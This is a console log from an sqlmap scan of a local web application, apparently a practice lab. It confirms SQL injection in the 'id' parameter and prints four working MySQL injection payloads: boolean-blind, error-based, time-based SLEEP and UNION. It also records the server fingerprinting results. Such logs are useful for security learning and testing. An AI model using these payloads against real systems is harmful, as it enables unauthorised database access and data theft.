        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.8#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:15:47 /2026-01-27/

[20:15:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[20:15:47] [INFO] testing connection to the target URL
[20:15:47] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:15:47] [INFO] testing if the target URL content is stable
[20:15:47] [INFO] target URL content is stable
[20:15:47] [INFO] testing if GET parameter 'id' is dynamic
[20:15:47] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:15:47] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:15:47] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:15:47] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[20:15:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:47] [WARNING] reflective value(s) found and filtering out
[20:15:48] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[20:15:48] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[20:15:48] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --not-string="Me")
[20:15:48] [INFO] testing 'Generic inline queries'
[20:15:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:15:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:15:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:15:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:15:48] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[20:15:48] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[20:15:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:15:48] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:15:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:15:48] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[20:15:48] [INFO] testing 'MySQL inline queries'
[20:15:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:15:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:15:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:15:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:15:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[20:15:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[20:15:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:15:58] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:15:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:15:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:15:58] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:15:58] [INFO] target URL appears to have 2 columns in query
[20:15:58] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[20:15:58] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 264 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: id=1' OR NOT 2912=2912-- keSG&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 5122 FROM(SELECT COUNT(*),CONCAT(0x7178626b71,(SELECT (ELT(5122=5122,1))),0x71786a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VtJu&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 3414 FROM (SELECT(SLEEP(5)))LQqz)-- cccZ&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178626b71,0x51576d4b62434c7a686275566a5841414e74504e5045736d6e6458624c6c6f744645586c77527353,0x71786a6271),NULL-- -&Submit=Submit
---
[20:15:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[20:15:58] [INFO] fetched data logged to text files under '/home/jordan/.local/share/sqlmap/output/localhost'

[*] ending @ 20:15:58 /2026-01-27/

